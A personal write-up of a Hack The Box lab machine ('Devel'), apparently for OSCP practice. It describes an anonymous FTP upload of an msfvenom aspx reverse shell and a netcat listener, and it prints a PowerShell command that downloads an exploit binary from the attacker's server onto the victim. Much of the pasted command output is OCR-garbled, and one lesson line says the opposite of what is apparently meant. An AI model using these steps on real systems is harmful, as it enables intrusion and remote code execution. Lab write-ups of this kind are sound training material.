Journey To OSCP - DEVEL - Christopher Boedicker's - Cyber Security Professional Resume

This is my attempt to solve HTB’s DEVEL

NMAP:

Website:

Not much of the website

FTP:

Port 21 is open and “Anonymous FTP login is allowed”:

Looking closer by logging in:

Ftp 10.10.10.5

I’m able to see items inside:

I learned that I can upload a web shell or reverse shell which help me get access into the site

Reverse Shell:

We can use msfvenom to create our custom payload for the exploit. For a clear understanding make sure to understand the various reverse shells available and to choose the right one. For example, select windows/meterpreter/reverse_tcp only if you use the Metasploit. Make sure to understand the difference between staged and unstaged payloads. In our case we use the non-meterpreter unstaged reverse shell payload windows/shell_reverse_tcp to generate the aspx payload. With this, I have the option to get a shell with a basic netcat listener. The staged version will not work with the netcat listener.

The listening host is the attacking machine (ip address |grep tun) and the port is the one we will listen on. I have created the backdoor executable binary. Upload this file as mentioned above to the FTP root directory.

Now go to the website: http://10.10.10.5/devel.aspx and have netcat setup and ready

And I have low privilege:

Privilege Escalation:

As soon as we visit the malicious URL 10.10.10.5/test.aspx the exploitation process starts. In the listener we can see, that we have a shell running as iis apppool\web.

$-nivp 5555 nc listening on [any] 5555 connect to [10.10. 14.11] from (UNKNOWN) [10.10. 10.5] 49162 Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. c: \windows \ sys tem32\inets rv>whoami whoami IS apppool\web c: rv>$

The next goal is to escalate my privileges. Windows Exploit Suggester is a tool which checks if public exploits are available for a specific machine. For this, I saved the output of systeminfo to a text file.

$c: rv>systeminfo systeminfo Host Name: OS Name: OS Version: OS Manufacturer: OS Configuration: OS Build Type: Registered Owner: Registered Organization: Product ID: Original Install Date: System Boot Time: System Manufacturer: System Model: System Type: Processor(s) : BIOS version: Windows Directory: System Directory: Boot Device: System Locale: Input Locale: Time Zone: Total Physical Memory: Available Physical Memory: Virtual Memory: Max Size: Virtual Memory: Available: Virtual Memory: In Use: Page File Location(s): Domain: Logon Server: Hotfix(s): Network Card(s): DEVEL Microsoft Windows 7 Enterprise 6. 1.7600 N/A Build 7600 Microsoft Corporation Standalone Workstation Multiprocessor Free babis 55041-051-0948536-86302 17/3/2017, 21/4/2021, VMware, Inc. VMware Virtual Platform X86-based pc 1 Processor(s) Installed. [01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD -2000 Mhz Phoenix Technologies LTD 6.00, C: \Windows el;Greek en-us;English (United States) (UTC+02:OO) Athens, Bucharest, 12/12/2018 Istanbul 3.071 MB 2.477 MB 6.141 MB 5.557 MB 584 MB HTB N/A N/A 1 NIC(s) Installed. [01]: vmxnet3 Ethernet Connection Name: DHCP Enabled: IP address(es) Adapter Local Area Connection 3 No [02] : [03] : [04] : 10.10. 10.5 fe80: :58c0. •flcf:abc6:bb9e dead: beef dead: beef •flcf:abc6:bb9e$

Key information : Windows 7 | Host name Devel | OS name Windows 7 Enterprise | 6.1.7600 | Hotfix N/A

Windows Priviliege escalation is my weakest area

I went to Google and found this exploit:

The next step is to download and compile the exploit on the attack machine.

I then needed to transfer the C code from the attacker to the victim.

python -m SimpleHTTPServer 8080

wget and curl are not installed on the machine however powershell is.

powershell -c “(new-object System.Net.WebClient).DownloadFile(‘http://10.10.14.63:8080/40564.exe’, ‘c:\Users\Public\Downloads\40564.exe’)”

I then ran [whoami /all]:

$c: /all whoami /all USER INFORMATION s-1 1-0 s-1-5-32-545 s-1-5-6 s-1-2-1 s-1-5-11 s-1-5-15 s-1-5-32-568 s-1-2-o s-1-5-82 -O User Name SID iis apppool\web S-1-5-82-2971860261-2701350812-2118117159 -340795515-2183480550 GROUP INFORMATION Group Name Mandatory Label\High Everyone BUILTIN\Users NT AUTHORITY\SERVICE CONSOLE LOGON Mandatory Level NT AUTHORITY\ALlthenticated Users NT AUTHORITY\This organization Type Label Well-known Alias Well-known Well-known Well-known Well-known Alias Well-known group group group group group group SID s-1-16-12288 token Attributes Mandatory Mandatory Mandatory Mandatory Mandatory Mandatory Mandatory Mandatory Mandatory group, group, group, group, group, group, group, group, group, Enabled Enabled Enabled Enabled Enabled Enabled Enabled Enabled Enabled by by by by by by by by by default, default, default, default, default, default, default, default, default, Enabled Enabled Enabled Enabled Enabled Enabled Enabled Enabled Enabled group group group group group group group group group BUILTIN\IIS IUSRS LOCAL PRIVILEGES INFORMATION Privilege Name SeAssignPrimaryTokenPrivilege SelncreaseQuotaPrivilege SeShutdownPrivilege SeAuditPrivilege SeChangeNotifyPrivilege SelJndockPrivilege Selmpersonateprivilege SecreateGlobalPrivilege SelncreaseWorkingSetPrivilege SeTimeZonePrivilege c: rv> Unknown SID type Description Replace a process level Adjust memory quotas for a process Shut down the system Generate security audits Bypass traverse checking Remove computer from docking station Impersonate a client after authentication Create global objects Increase a process working set Change the time zone State Disabled Disabled Disabled Disabled Enabled Disabled Enabled Enabled Disabled Disabled$

User flag:

$Users cd Users babis cd babis dir Volume in drive C has no label. Volume Serial Number is 8620-71F1 Directory 17/03/2017 17/03/2017 17/03/2017 18/03/2017 17/03/2017 17/03/2017 17/03/2017 17/03/2017 17/03/2017 17/03/2017 17/03/2017 17/03/2017 17/03/2017 of 05. 05. •17 05. 02. 14 05. 05. •17 05. 05. 05. 05. •17 05. 05. 05. O File(s) Contacts Desktop Documents Downloads Favorites Links Music Pictures Saved Games Searches Videos O bytes 13 Dir(s) 22.275.076.096 bytes free c: Desktop cd Desktop dir Volume in drive C has no label. Volume Serial Number is 8620-71F1 Directory of 18/03/2017 18/03/2017 18/03/2017 02:14 02:14 02:18 1 File(s) 32 user. txt. txt 32 bytes 2 Dir(s) 22.275.076.096 bytes free c:\Users\babis\Desktop>type user. txt. txt type user. txt. txt 9ecdd6a3aedf24b41562fea70f4cb3e8$

Root flag:

$Administrator cd Administrator dir Volume in drive C has no label. Volume Serial Number is 8620-71F1 Directory 18/03/2017 18/03/2017 18/03/2017 14/01/2021 18/03/2017 18/03/2017 18/03/2017 18/03/2017 18/03/2017 18/03/2017 18/03/2017 18/03/2017 18/03/2017 of c:\Users\Administrator 02. 02. •16 02. 12. 02. 02. •16 02. 02. 02. 02. •16 02. 02. 02. O File(s) Contacts Desktop Documents Downloads Favorites Links Music Pictures Saved Games Searches Videos O bytes 13 Dir(s) 22.275.076.096 bytes free c: \Users\Administrator>cd Desktop cd Desktop dir Volume in drive C has no label. Volume Serial Number is 8620-71F1 Directory of c:\Users\Administrator\Desktop 14/01/2021 14/01/2021 18/03/2017 12:42 12:42 02:17 1 File(s) 32 root. txt 32 bytes 2 Dir(s) 22.275.076.096 bytes free c: root. txt type root. txt e621a0b5041708797c4fc4728bc72b4b$

That’s it

Lessons Learned:

FTP Should have an open login like anonymous.

Anyone like I just did can upload a Web shell and exploit the system.

I recommend either patching Windows 7 Enterprise or upgrading to the modern version of Windows and service for Windows 7 is now depricated.

Overall this box was challenging, I cold have done it with Metasploit, but I’m trying to get better without using Metasploit.